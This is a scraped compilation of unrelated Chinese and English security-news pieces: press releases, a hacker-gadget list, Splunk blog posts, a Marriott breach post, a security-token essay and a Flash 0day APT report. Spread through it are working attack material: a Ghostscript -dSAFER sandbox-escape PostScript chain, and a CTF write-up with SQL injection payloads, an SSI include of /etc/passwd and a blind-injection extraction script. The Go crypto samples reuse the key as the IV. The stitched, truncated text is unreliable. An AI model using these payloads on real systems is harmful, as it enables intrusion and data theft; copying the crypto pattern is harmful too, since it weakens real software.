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英迈中国宣布与 Palo Alto Networks 达成分销协议


英迈中国宣布与 Palo Alto Networks 达成分销协议

12 月 7 日,技术与供应链服务商英迈今日宣布与网络安全公司 Palo Alto Networks (派拓网络)达成分销协议,为其广大中国用户提供高商业价值的创新型解决方案。

英迈中国区首席执行官邵岩鸣表示:「英迈将凭借国际领先的分销管理经验和专业管理团队,向 Palo Alto Networks(派拓网络) 签约渠道和专业代理商提供更优质和广泛的解决方案。此次英迈与 Palo Alto Networks(派拓网络) 分销协议的达成,将进一步加速其在跨云端、网络和移动设备网络安全解决方案方面走向市场的步伐,为广大客户实现数字化转型提供安全保障。」

Palo Alto Networks (派拓网络) 大中华区副总裁陈文俊表示:「很高兴能够与英迈达成协议,与英迈的合作将进一步扩大 Palo Alto Networks(派拓网络) 包括新兴城市在内的全国渠道覆盖范围,并重点为公有云、私有云和物联网行业保驾护航。同时,我们也会凭借在网络安全领域的多年积累,不断培养和拓展高度发展的安全市场。」



本文我将为大家列举10个作为黑客的你最值得拥有的小工具。这些工具非常适合作为你无聊时的调剂品,或是作为生日圣诞礼物送给你的白帽朋友。当然,文中提及的某些项目可能并不适合所有的渗透测试人员。譬如无线爱好者可能会对下面的天线感兴趣,因为它能够通过无线方式捕获到击键,类似于WPA2握手包的抓取。而对四轴飞行器(Quadrotor)感兴趣的人可能会更关注无人机,因为它们能够在不丢失信号的情况下飞行1-2英里,并可携带Wi-Fi Pineapple和Raspberry Pi等附加硬件。

一、Mousejack Hacking

2016年,安全公司 Bastille Networks(巴士底狱) 安全研究员发现,大多数无线鼠标和接收器之间的通信信号是不加密的。允许攻击者在一百米范围内控制目标计算机而无需任何的物理访问,并将他们的设备匿名配对使用流行无线键盘适配器的目标计算机进行远程击键注入(如下所示)。



有关此攻击的更多信息,请访问Bastille官方网站,获取 受影响设备列表 和 技术细节 。

这些攻击中使用的“ Crazyradio USB Dongle ”是一个2.4 GHz的双向收发器,可以发送和接收无线电遥测。从本质上讲,这个USB Dongle可用于观察,记录以及无线电波的注入。

Crazyradio USB Dongle MSRP $44.99( Amazon )
二、用于密码破解的 GPU

图形处理器(GPU) 通常嵌入连接到计算机主板的内部显卡中,用于高效处理图像游戏内存等问题。可以说GPU负责我们电子设备上的所有视频和图像渲染。

黑客则可以利用GPU技术 构建自己专属的密码破解设备 ,这将大大缩短爆破的时间以及提升爆破的成功率。Tokyoneon在他的帖子“ Hack 200 Online User Accounts in Less Than 2 Hours ”中充分证明了该方案的可用性。他通过GPU成功破解了 泄露密码数据库 中的哈希,并接管了数百个Twitter,Facebook和Reddit用户帐户。

对于正在考虑使用GPU来破解密码的你来说,我强烈推荐 GeForce显卡(GeForce GTX 1050 Ti) 。这款显卡的售价仅为189美元,是一款出色的入门级GPU。

EVGA GeForce GTX 1050 Ti MSRP $219.99( Amazon | Best Buy | EVGA | Walmart )

当然,如果你想要你的密码破解设备更为高效和强大,你可以选择购买 GTX 1080 Ti 或是 RTX 2080 Ti (吊丝表示还是当个吃瓜群众~)。

EVGA GeForce GTX 1080 Ti $899.99 & Up( Amazon )

GPD Pocket 被称为“世界上最小的笔记本电脑”,它采用Intel Atom X7, 1920 x 1080分辨率和8 GB RAM,装在一台小型笔记本电脑中,只比大多数现代智能手机大一点儿(如下图所示)。

GPD Pocket MSRP $599( Amazon | eBay | GPD | Walmart )

由于其体积小,拥有物理键盘,处理高性能游戏的能力以及优于 Raspberry Pis 和 智能手机 的英特尔CPU,而受到越来越多人的青睐。

渗透测试人员可以在此设备上轻松 安装各种linux操作系统 ,包括Ubuntu,Kali Linux和BlackArch,而不是默认的windows 10。

如果你想要更薄功能更为完善的GPD Pocket,你可以入手最新推出的 GPD Pocket 2 。相比GPD Pocket它的厚度至少减少了一半。

GPD Pocket 2 $799( Amazon | GPD | Indiegogo )
四、最新的 Raspberry Pi

今年刚推出的Raspberry Pi 3 Model B+,具有更快的CPU,以及升级的Wi-Fi和Ethernet模块,并且可以使用Ethernet端口( PoE HAT )在没有传统电源适配器的情况下供电。

关于 使用Raspberry Pi构建黑客专用便携式设备 的帖子在之前已发过很多,因此这里就不再详细进行介绍了。

Raspberry Pi 3 B+ MSRP $35( Amazon | Walmart ) With power supply MSRP $47.95( Amazon ) With power supply and



今天给大家分析的是一种新型的 ghostscript-dSAFER沙盒逃逸技术 ,目前这项技术仍然适用于当前正在使用的所有ghostscript版本。我不知道这个漏洞存在多久了,反正我是觉得已经很久了…



[emailprotected]:~$convert exploit.jpg output.jpg [emailprotected]:~$tail -1 ~/.bashrc

echopwned by postscript


Postscript的一个核心访问控制功能就是它能够标记可执行代码的运行过程,这样可以防止用户窥视系统程序的执行,并获取更强大的访问操作权限。为此,我专门设计了一个完整的漏洞利用代码,感兴趣的同学可以自行下载测试【 下载地址 】。

当你在 errordict 中安装了错误处理器之后,如果你终止了一个正在执行的操作进程,这样便会将错误操作符暴露给错误处理器。此时,,rrorerdict便会忽略-dSAFER沙箱,这也就是本文所利用的漏洞 CVE-2018-17183 。






GS>01 300368 {} for


GS<300369>/pdfopdict null def


GS<300369>GS_PDF_ProcSet/switch_to_normal_marking_ops get stopped


GS<2>== True


GS<1>dupdup length 10 sub 10 getinterval == [300364300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]



systemdict/SAFER false forceput systemdict/userparams get /PermitFileControl [(*)] forceput systemdict/userparams get /PermitFileWriting [(*)] forceput systemdict/userparams get /PermitFileReading [(*)] forceput


$ gs-dSAFER -f test.ps GPLGhostscript GIT PRERELEASE 9.26 (2018-09-13) Copyright(C) 2018 Artifex Software, Inc. Allrights reserved. Thissoftware comes with NO WARRANTY: see the file PUBLIC for details. (root:x:0:0:root:/root:/bin/bash) 漏洞利用代码

下载地址:【 点我下载 】

* 参考来源: mailclark ,FB小编Alpha_h4ck编译,转载请注明来自CodeSec.Net





const BlockSize = 16


package main import ( "bytes" "crypto/aes" "crypto/cipher" "log" "fmt" ) // 填充数据 func padding(src []byte, blockSize int) []byte { padNum := blockSize - len(src) % blockSize pad := bytes.Repeat([]byte{byte(padNum)}, padNum) return append(src, pad...) } // 去掉填充数据 func unpadding(src []byte) []byte { n := len(src) unPadNum := int(src[n-1]) return src[:n-unPadNum] } // 加密 func encryptAES(src []byte, key []byte) ([]byte, error) { block, err := aes.NewCipher(key) if err != nil { return nil, err } src = padding(src, block.BlockSize()) blockMode := cipher.NewCBCEncrypter(block, key) blockMode.CryptBlocks(src, src) return src, nil } // 解密 func decryptAES(src []byte, key []byte) ([]byte, error) { block, err := aes.NewCipher(key) if err != nil { return nil, err } blockMode := cipher.NewCBCDecrypter(block, key) blockMode.CryptBlocks(src, src) src = unpadding(src) return src, nil } func main() { d := []byte("hello,ase") key := []byte("hgfedcba87654321") fmt.Println("加密前:", string(d)) x1, err := encryptAES(d, key) if err != nil { log.Fatalln(err) } fmt.Println("加密后:", string(x1)) x2, err := decryptAES(x1, key) if err != nil { log.Fatalln(err) } fmt.Println("解密后:", string(x2)) }





知道创宇404实验室:知道创宇404实验室是知道创宇神秘而核心的安全研究团队,长期致力于Web、IoT、工控、区块链、云安全、移动安全等领域内安全漏洞挖掘、攻防技术的研究工作,在业内享有非常高的声誉,404实验室是最早具备全球漏洞风险感知的团队,并对全球重大安全事件、高危漏洞跟踪研究并输出安全能力,曾多次向国内外多家知名厂商如微软、苹果、Adobe、腾讯、阿里、百度等提交大量安全漏洞研究成果,并协助修复安全漏洞,多次获得相关致谢, 为提升业界安全水平作出了重要贡献。404实验室主导的KCon黑客大会、Sebug 漏洞社区、ZoomEye 网络空间搜索引擎,简称“KSZ”,是知道创宇安全产品及服务能力的最有力保障,也是技术实力长期保持在国际顶尖水平的秘诀。




深信服千里目安全实验室:千里目,取自王之涣《登鹳雀楼》“欲穷千里目,更上一层楼”;又有荀子《劝学》“到此岂可千里目,哪知才上一层楼”。寓意均为站得高才能看得远,学无止境,勇攀高峰。在网络安全攻防技术研究领域只有不断地努力钻研,才能不断提高专业技术造诣,进而抵御更多的未知网络安全威胁。我们更希望做网络空间的一双眼睛,拥有更加敏锐长远的眼光(Further eye),深度洞察未知网络安全威胁,解读前沿安全技术。


蚂蚁金服光年安全实验室:蚂蚁金服光年安全实验室组建于2016年底(原巴斯光年安全实验室),由多位资深安全专家组成的金融支付安全领域实验室,有着丰富的黑灰产抗击经验和行业内顶尖的攻防技术能力。除致力于护航蚂蚁金服相关产品安全,同时也通过前沿的安全技术的分享来赋能外部合作商户/厂商以及生态伙伴的安全。目前核心安全能力领域包括移动端浏览器的漏洞挖掘与利用、移动操作系统漏洞攻防研究、移动端应用供应链体系的漏洞攻防研究、生物识别安全以及IoT安全等。近一年来,实验室在在国内外多个重量级安全舞台上先后发布了具有行业影响力的安全研究成果,也获得了 Google、Apple 以及三星等多个厂商的致谢。


未来安全胖猴实验室:胖猴实验室(PwnMonkey Security Lab)专注于互联网和物联网的前沿安全攻防技术研究,拥有业界优秀的安全分析团队,核心成员均有多年从事安全研究的经验。在其相关的研究领域中,该实验室数次发现重大安全隐患并整理成安全风险报告提供给有关的企业和部门,及时阻止潜在安全问题的出现。


360天马&天巡联合实验室:360天马&天巡联合实验室是360负责无线安全研究的安全团队,主要负责无线局域网攻防技术的探索与研究,为无线局域网安全提供富有创新性和实用性的攻防技术,同时为各种应用场景提供完整的无线安全解决方案。自实验室成立以来共获得发明专利6项、外观专利3项,在大数据分析、无线威胁检测、无线攻防等方面积累大量经验,众多安全研究成果入选了BlackHat USA/Europe、DEFCON、HITB、CodeBlue、KCon等国内外知名安全会议,并与公安三所合作建立国内首个针对Wi-Fi安全的技术标准。实验室基于在无线领域的攻防能力与企业网络防御经验,打造了国内首个独立式无线入侵防御系统-天巡。4年里服务了超过300家各领域客户,为客户提供先进的无线安全解决方案,打造国内无线安全产品第一品牌。


腾讯安全科恩实验室:腾讯科恩实验室作为腾讯集团旗下一支国际一流的信息安全团队,在桌面端安全、移动终端安全等研究领域有十多年的积累,技术实力和研究成果达到了国际领先水平;近几年来,更是在智能网联汽车信息安全、IoT 安全、云计算和虚拟化技术安全等领域取得丰硕的成果。随着更多ICT新技术进入大众视野,腾讯科恩实验室也积极布局人工智能算法和技术框架的安全研究、机器学习在信息安全研究领域的应用研究和区块链技术应用的安全研究等新纬度上的前沿技术研究能力。同时开放自身核心技术能力,并固化为云端智能检测SaaS服务,提供给智能网联汽车、安卓应用生态、IoT等行业,并根据产业实际痛点和研究推出了智能网联汽车信息安全行业解决方案。护航各行业数字化变革,守护全网用户的信息安全是腾讯科恩实验室的使命。


360Vulcan Team:360Vulcan Team核心技术人员均为全球领先的顶级资深信息安全专家,团队研究方向为漏洞挖掘与利用。在主流浏览器、主流操作系统内核、常用软件、虚拟化软件、区块链软件的漏洞挖掘利用等多个领域有深入的积累和成果。团队在微软、谷歌、苹果、Adobe、VMWare等厂商的产品中累计发现数百个高位漏洞,并获得厂商的公开致谢。团队多名成员连续多年入选微软MSRC TOP 100安全研究者榜单,并且团队成员在2017/2018年连续两年成为该榜单中排名最高的华人安全研究员。团队多次参加国内外知名黑客破解大赛并取得优异成绩。在Pwn2Own 2015/2016/2017,Mobile Pwn2Own 2017,PwnFest 2016中成功破解IE、Edge、Chrome、Safari、Adobe Reader、Adobe Flash、iPhone、Mac OS X、Window 10、VMware Workation等项目,并在Pwn2Own 2017大赛中获得Master of Pwn称号。在2018年5月,团队在市值百亿的区块链平台EOS中发现了史诗级安全漏洞并报告给厂商修复,该漏洞可以直接实现远程代码执行从而控制整个EOS网络。在刚刚结束的天府杯网络安全破解大赛中,团队成功破解了Edge、Chrome、Adobe Reader、VMWare Workstation、Virtual Box、Apple Safari、iPhone X远程越狱、Office 365等项目,获得团队和个人双料冠军。



安恒海特实验室:安恒信息海特实验室隶属于杭州安恒信息技术股份有限公司安全研究院,是一支专注于物联网安全研究的团队。海特实验室(HatLab),寓意为“Hack AnyThing”,研究领域包含智能家居安全、车联网安全、智慧医疗安全、工业互联网安全等。在成立至今,已先后发现多款国内外著名品牌汽车、多款国内外著名摄像头、多款国内外著名品牌的路由器、多个著名品牌的智能网关、多款国内外知名智能门锁的严重安全漏洞等并协助厂商修复,为营造健康、安全的物联网环境作出重要的贡献。



Advancing Security Operations at Penn State University with Phantom Automation


The following is a guest blog post from Chris Decker, Enterprise Security Manager at Penn State University .

Consider information security at an organization that has 17,000 employees, 100,000 inhabitants, an airport, a power plant and a police force. You might think we're talking about protecting assets for a mid-size city or large corporation―that'd be a good guess. A large university; well, that might surprise a few people.

Large universities present their own unique information security challenges. In some ways, their size and scope are like a mid-size city; in other ways, they are even more complex. Universities have large, legacy administrative systems, cutting edge research, intellectual property and lots of sensitive data. In other words, they have valuable information assets. Now consider the fast, open networks, a diverse user base and decentralized IT support―along with the expectation of autonomy to support free-thinking. It can be easy to imagine the risks.

Advancing Security Operations at Penn State University with Phantom Automation
As you can imagine, threat detection in this environment and at this scale can be challenging. Penn State’s Office of Information Security is tasked with detecting threats in our environment, while not impeding the primary mission of the University.

Higher education resources are often limited and we have to work to make the most of available resources. A growing challenge inhigher education information security is staffing a SOC with qualified, experienced personnel. Penn State is no different. In contrast, there seems to be an unlimited supply of adversaries operating in a 24x7 fashion. This creates significant workloads that can burn out or even overwhelm our analyst. It quickly became evident that we needed to turn to automation to supplement our analysts.

In the past, each analyst used their work experience to “duct tape” together a variety of python, Perl and bash scripts, but that was very time consuming as systems and APIs changed and quickly became difficult to maintain. It also was a huge barrier for less experienced personnel who had no scripting or programming background. Finally, while we have “plays,” occasionally a step would be overlooked or forgotten.

Earlier this year we purchased theSplunk Phantomplatform to help address these problems.

The first challenge we threw at Phantom was to automate our Tier-1 phishing workflows. We receive more than 50 phishing reports daily, many of which are duplicates. A team of analysts pours through the submissions, takes appropriate action and then provides a tailored response to the submitter. This process is tedious, time consuming and frankly it ties up analysts whose time is better spent elsewhere.

With Phantom, this workflow is now automated. Previously-known threats are automatically triaged and a tailored response is sent back to the submitter with no human interaction required. All other submissions are sent to Phantom Playbooks to enrich the data so an analyst has all of the necessary information at their fingertips:

Submitter information (department, title, priority, etc.) from Splunk URL reputation information from Virus Total and Google Safe Browsing Screenshot and copies of the source code for each URL

If a response is necessary, Phantom runs a series of remediation playbooks to interact with our various security appliances, using the Phantom-provided “apps.” This saves us from having to learn the various APIs and ensures consistency. Phantom also has a tight integration withSplunk Enterprise, allowing us to feed the results back to Splunk so we can use the power of SPL to aid in future detection efforts. The end result is then added back to Phantom so that related submissions are automatically triaged in the future.

Although it's early, Phantom is already freeing up analysts to work on tasks that a computer is not (yet) good at solving. If you find that your organization is also struggling to keep up, consider an automation platform. Phantom is the right tool for our needs.

Catch Chris talk more about his automation journey on the webcast, " A Tale of Two SOCs: Regaining Control Using Automation ."

Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant



Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant


Gartner recently published the 2018 Magic Quadrant for Security Information and Event Management (SIEM) and Splunk was named a Leader for the sixth straight year. In the report, Gartner placed Splunk in the Leaders quadrant with the highest overall position in “Ability To Execute”.

We are honored by this recognition, which reflects ourcustomers’ successes, our continued investments in innovative solutions that solvesecurity monitoring andthreat detection use cases identified in the Magic Quadrant.

Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant
Splunk Security Portfolio

Oursecurity portfolio helps customers to realize their Nerve Center and address a wide range of security monitoring and threat detection use cases. Customers use Splunk Enterprise Security and Splunk User Behavior Analytics together as an Analytics-Driven SIEM to build their Security Operations Centers to detect, investigate and respond to threats.Splunk Phantom, the leading security orchestration, automation (SOAR) and response solution helps customers to investigate and accelerate their response to incidents.

Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant

Splunk and partner apps, playbooks and analytic stories extend and simplify deployments by providing pre-packaged, ready to deploy content designed for specific use cases and data types.

Get Your Copy of the 2018 SIEM Magic Quadrant

Register for a complimentary copy of the 2018 Gartner Magic Quadrant for SIEM today!

Are you in a hurry to get started with your first SIEM or migrate away from your legacy SIEM?LearnhowFINRAandREIuse Splunk.

Contact us to find out how you can benefit from Splunk Security Solutions.

Girish Bhat

Director, Security Product Marketing



Disclaimer: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Attribution: Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 3 December 2018

Six Straight Years! Splunk Named a Leader in the Gartner SIEM Magic Quadrant

Posted by

Girish Bhat

Girish Bhat is the director of security product marketing at Splunk with responsibility for key security solutions, the Splunk CISO customer advisory board and customer use cases.

Previously, Girish held various roles managing authentication, compliance, VPN, advanced threats, DLP, IDS/IPS, mobile, SaaS, IaaS, virtualization and network monitoring solutions.

With more than 15 years of experience with startups and global brands, Girish’s experience includes product marketing, business strategy, strategic analysis, solutions marketing, product management for security, mobile, networking, cloud and software products.

Fun-time Friday - Data outages, Security Breaches and Brexit


It’s been an interesting week here at gethynellis.com . We have been busy with a SQL Server version upgrade for a customer, the new solution combining Always On Availability Groups and merge replication. We have also been helping a customer with some on premises SQL Server builds, creating a new pre-production environment. Fun times - its good to know on premises is still a thing . It’s the news this week that has been most interesting.

O2 Data network meltdown 25 - 30 Million people affected

Thursday this week was an unusual and difficult day for users of the O2 phone network. It seems that in the early hours of Thursday morning something fundamental in the O2 network broke. Meaning that some 25 million people (I have seen this quoted as being as high as 30 million, which include other suppliers who utilise the O2 infrastructure.) had no access to data on their phones. How did people cope? It’s back up and running as of Friday morning, Software and a third party suppliers are being blamed along with an expired certificate.

I did find this tweet particularly funny

Fun-time Friday - Data outages, Security Breaches and Brexit

If it did nothing else, the O2 outage further highlighted how dependent people have become on using their smart phones and having internet access in particular. O2 have mentioned compensating customers for the outage, I haven’t seen any details on how that will work but it will be interesting to see how that materialises.

Marriott data breach

Affecting Starwood hotels... The following is an extract from an email I have received from Marriott telling me about a Starwood hotels data breach. I have stayed in Marriott hotels on many occasions. I don't recall staying in a Starwood hotel however the fact I'm getting this email must mean my details are in their databases... Worrying!

"On September 8, 2018 an alert was received from an internal security tool regarding an attempt to access the guest reservation database...Security experts were engaged to help determine what occurred. We learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database and determined that the contents were from the Starwood guest reservation database.

The information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest ("SPG") account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information."

So someone has been rumbling around in this database for four years without anybody noticing, with access to a plethora of data including in some cases credit card information ... Oh dear! I suspect this will not be last the last we hear of this.


You can't round up this week without mentioning Brexit. Let’s not talk about politics for too long or we’ll all get depressed, but it’s been an interesting and possibly a slightly worrying week as Teresa May attempts to sell "The Deal" to MPs. ( It doesn't feel like a great deal to me ).

Every day in parliament this week has been the most important day in parliament’s history since... well the previous day. There is no doubt a long way to go before we get anywhere near a solution to the Brexit problem. Although if the "meaningful vote" is defeated on Tuesday next week, assuming the vote happens and is not delayed we might heading for a new Prime Minister or even another general election all before Christmas.

Interesting Times...I wonder what fun next week will bring.

Fun-time Friday - Data outages, Security Breaches and Brexit
Fun-time Friday - Data outages, Security Breaches and Brexit

A Few Thoughts on Security Tokens

A Few Thoughts on SecurityTokens As understood by an engineer with no background in economics, finance ortrading

Júlio Santos

Our economy has evolved to consider and account for a variety of different assets: stocks, bonds, real estate, commodities, intellectual property, and many others. Trading some of these assets is constrained by their physicality, as it may be cumbersome to physically trade ownership, or even to subdivide the asset.

A Few Thoughts on Security Tokens

In order to help address this issue, we invented securitization. That’s the process of transforming ownership of an asset or a right into an easily tradable security. We predict that, with the emergence and maturity of blockchain technology, and the development of open standards, we will be enabled to expand on the concept and impact of securitization. We will do this through the tokenization of assets.

The digitization and standardization of securities trading has a long history already, but many of these systems remain walled gardens with no interoperability. They’re not open systems in which anyone, even with the right requirements, can participate at will. And they’re heavily intermediated by parties whose roles (providing trust and mitigating risk) could be made obsolete with the trustlessness, transparency and decentralized consensus of a blockchain system.

Now that we have the technological means to achieve it, tokenizing relatively illiquid assets and creating a market in which to trade these tokens is inevitable. Traditional, relatively illiquid assets stand to gain a substantial liquidity premium which, together with the slashing of fees due to disintermediation, represents an enormous market opportunity.

Advantages of securitytokens

Tokenized securities are disruptive to modern financial markets because of their disintermediation potential, global exposure, and programmatic operation. A few advantages of security tokens are:

lower fees access to a global pool of capital faster settlements fractional ownership 24/7/365 markets increased liquidity no minimum investments automated compliance asset interoperability

All these combined should lead to a greater market efficiency, and the programmatic nature of these tokens will open the floodgates for new financial technology. Building a standardized protocol on top of which quants and other developers can dream up new financial products and services is paramount, as it truly enables innovation to accelerate in the space. Critically, this innovation would be permissionless, as it wouldn’t be limited to the R&D departments of the current large players in the financial space.

Standardization and interoperability

Standardization and interoperability are two crucial concepts in the movement for the opening up of financial markets.

Over the years the financial world has developed some standards, and it’s not a new idea. It would otherwise be impossible for your broker to hold shares in different companies using the same legal structure. Tokenization, however, enables us to take this concept to new heights by standardizing ownership in many different asset classes and making it possible for them to be held in the same wallet, used as collateral for loans, and straight up trading without the need for cash intermediation. I envision all asset classes to merge into a global pool of liquidity, interoperable through a common API.

Automated compliance

A great advantage of security tokenization is the potential for automated compliance. We’re experimenting with a token with embedded compliance: a compliance-native token if you will. This prevents the tokenized security from falling into the wrong hands, while maintaining disintermediation at the trading stage.

It’s easy to conceive of a nave version of this technology. For those familiar with the ERC-20 standard, you can picture expanding on that contract with a restriction so that ownership transfers can only happen for addresses which have been registered as having undergone the proper level of financial due diligence (KYC/AML/CFT, capital markets regulations, investor accreditation).

These security tokens, with embedded compliance, should make the compliance process so seamless and auditable that I predict regulators will start demanding the tokenization of securities for these advantages alone. The enforcement of regulations will be that much simpler in this world. There’s good reason to believe this will happen, as we’ve seen regulators demanding technology adoption in the past .

Regulation will, inevitably, have to evolve. Some countries regulate the form under which some ownership transfer has to take place, or demand a physical paper trail. We believe that competitive pressures brought about by pioneer local financial markets will push other regulators to embrace this new technology.

A sample technical draft Embedded compliance

Picture, as described above, a token instantiation contract which requires buyers to have undergone some level of KYC. The buyer would have to submit themselves to a thorough registration by an identity provider, such as Fractal ID . Upon successful verification, Fractal ID could provide them with a cryptographically signed claim of such KYC verification, which they can use as an attestation for the token contract to prove their eligibility to buy. At that point, the contract will allow a sale, by allowing ownership in the tokens to be attributed to this buyer.

An interesting possibility of the mechanism devised above is that the token contract doesn’t need to know the identity of the buyer, only that they underwent a required level of KYC, provided the contract trusts Fractal’s claims.

Automatic liquidity provisioning

This is an example of what a smart contract / application network could look like.

A Few Thoughts on Security Tokens

The example above provides the following functionality:

Onboarding/tokenization of offline assets Registration of tokenized assets Price discovery Automatic loan applications Liquidity provisioning Loan insurance Credit/reputation scoring

As an example, let’s assume a loan marketplace to which an investor has provided liquidity, to be provisioned for loans that meet certain acceptance criteria. For example, the loan must be collateralized by tokenized assets, insured by a third party, and only granted to individuals with a certain credit score. At this point, an individual can use their registered Cryptokitties, which are dynamically priced, as collateral for said automated loan. This loan is then managed by the escrow contract, which holds custody of the collateral and the provisioned liquidity. The user would make regular interest payments on the loan to this contract, which are passed on to the investor.

Planning an ICO?At Fractal , we offer a hassle-fre












又作?接到消息后,八卦的雷锋网 (公众号:雷锋网) 赶紧找到好朋友360集团助理总裁郑文彬聊了聊,对此次APT攻击事件的来龙去脉做了个全面了解。

玩儿“自毁”的Flash 0day漏洞

此次APT(高级持续性威胁)攻击被360称作“毒针”行动,行动以一份使用了最新Flash 0day漏洞cve-2018-15982和带有自毁功能专属木马程序的俄文内容员工问卷文档为开端,攻击过程主要分为三个阶段:



2>当受害者打开员工问卷文档后,将会播放Flash 0day文件;


播放Flash 0day漏洞




不过,这Flash 0day漏洞究竟有何神通竟被选中对具备极高敏感度的俄罗斯联邦总统事务管理局展开攻击?

原来,此次的CVE-2018-15982 0day漏洞是flash包com.adobe.tvsdk.mediacore.metadata中的一个UAF漏洞。利用代码借助该漏洞,可以实现任意代码执行。从最终荷载分析发现, PE荷载是一个经过VMP强加密的后门程序。解密后发现,主程序主要功能为创建一个窗口消息循环,有8个主要功能线程,其中包括定时自毁线程。





11月29日下午,360安全大脑所属QEX团队和高级威胁沙箱团队分别通过应对高级威胁的探针技术,云端沙箱首次探测到Flash 0Day漏洞。随后,追日团队对该样本漏洞进行了分析溯源并还原了攻击全貌,最终将其确定为一起针对俄罗斯的APT攻击行动。





作为为数不多的几家向全世界执法机构出售监控工具的公司之一,Hacking Team帮助政府针对新闻记者、激进分子、政府中的反对派以及其他对政府可能造成的威胁因素进行入侵和监控。



Hacking Team被攻击 大量信息遭泄露













微博昵称为@钢冰水火的网友:“忙也帮了,Adobe 就不考虑给点儿奖励吗?”








雷锋网原创文章,未经授权禁止转载。详情见 转载须知 。






admin' and (extractvalue(1,concat(0x7e,database())))#


admin' and (extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()))))#


admin' and (extractvalue(1,concat(0x7e,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'))))#


admin' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1))))#



admin' and (extractvalue(1,concat(0x7e,(select substr(flag,30,60) from flag limit 0,1))))#







SimpleServerInjection, SSI, flag in current directory




<!--#include virtual="/etc/passwd" -->

于是测试<!--#include virtual="flag" -->



















sky' sky'#





1' and if(1,exp(999999999999),1)#


grade 0


1' and if(0,exp(999999999999),1)#



import requests def reg(username,password='1'): data = { 'username':username, 'password':password } url = '' r = requests.post(url=url,data=data) return r.headers['Set-Cookie'][10:-8] def login(session,username,password='1'): data = { 'username': username, 'password': password } cookie = { 'PHPSESSID':session } url = '' r = requests.post(url=url, data=data,cookies=cookie) data = { '10.a':'on' } url = '' r = requests.post(url=url, data=data,cookies=cookie) if 'Your grades is 0' in r.content: return 1 url = '' r = requests.get(url=url,cookies=cookie) return 0 flag = 'EIS{' for i in range(5,1000): for k in 'abcdef0123456789}': j = ord(k) payload='''1' and if((ascii(substr((select flag from flag limit 0,1),%d,1))=%d),exp(999999999999),1)#'''%(i,j) try: session = reg(payload) if login(session,payload): flag+=chr(j) print flag break except: session = reg(payload) if login(session,payload): flag+=chr(j) print flag break






说明,内容转载至: http://blog.studygolang.com/2013/01/go%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%E4%B9%8Bdes/

Go DES加密解密


Go 中 crypto/des 包实现了 Data Encryption Standard (DES) and the Triple Data Encryption Algorithm(TDEA,三重DES加密)。查看该包文档。


func NewCipher(key []byte) (cipher.Block, error) func NewTripleDESCipher(key []byte) (cipher.Block, error)





func DesEncrypt(origData, key []byte) ([]byte, error) { block, err := des.NewCipher(key) if err != nil { return nil, err } origData = PKCS5Padding(origData, block.BlockSize()) blockMode := cipher.NewCBCEncrypter(block, key) crypted := make([]byte, len(origData)) blockMode.CryptBlocks(crypted, origData) return crypted, nil }

以上代码使用DES加密(des.NewCipher),加密模式为CBC(cipher.NewCBCEncrypter(block, key)),填充方式PKCS5Padding,该函数的代码如下:

func PKCS5Padding(cipherText []byte, blockSize int) []byte { padding := blockSize - len(cipherText) % blockSize padText := bytes.Repeat([]byte{byte(padding)}, padding) return append(cipherText, padText...) }



func DesDecrypt(crypted, key []byte) ([]byte, error) { block, err := des.NewCipher(key) if err != nil { return nil, err } blockMode := cipher.NewCBCDecrypter(block, key) origData := make([]byte, len(crypted)) // origData := crypted blockMode.CryptBlocks(origData, crypted) origData = PKCS5UnPadding(origData) // origData = ZeroUnPadding(origData) return origData, nil }


func PKCS5UnPadding(origData []byte) []byte { length := len(origData) // 去掉最后一个字节 unpadding 次 unpadding := int(origData[length-1]) return origData[:(length - unpadding)] }



// 3DES加密 func TripleDesEncrypt(origData, key []byte) ([]byte, error) { block, err := des.NewTripleDESCipher(key) if err != nil { return nil, err } origData = PKCS5Padding(origData, block.BlockSize()) // origData = ZeroPadding(origData, block.BlockSize()) blockMode := cipher.NewCBCEncrypter(block, key[:8]) crypted := make([]byte, len(origData)) blockMode.CryptBlocks(crypted, origData) return crypted, nil }



The length of iv must be the same as the Block’s block size.

可是代码中的实现却没有做判断。不过,go tips中修正了这个问题,如果iv不等于block size(des为8),则直接panic。所以,对于加解密,一定要测试,保证iv等于block size,否则可能会panic:

func NewCBCDecrypter(b Block, iv []byte) BlockMode { if len(iv) != b.BlockSize() { panic("cipher.NewCBCDecrypter: IV length must equal block size") } return (*cbcDecrypter)(newCBC(b, iv)) }



// 3DES解密 func TripleDesDecrypt(crypted, key []byte) ([]byte, error) { block, err := des.NewTripleDESCipher(key) if err != nil { return nil, err } blockMode := cipher.NewCBCDecrypter(block, key[:8]) origData := make([]byte, len(crypted)) // origData := crypted blockMode.CryptBlocks(origData, crypted) origData = PKCS5UnPadding(origData) // origData = ZeroUnPadding(origData) return origData, nil }






const BlockSize = 64 // MD5字节块大小 const Size = 16 // MD5校验和字节数 func Sum(data []byte) [Size]byte


func New() hash.Hash


h := md5.New() h.Write([]byte("123456")) fmt.Println(h.BlockSize())



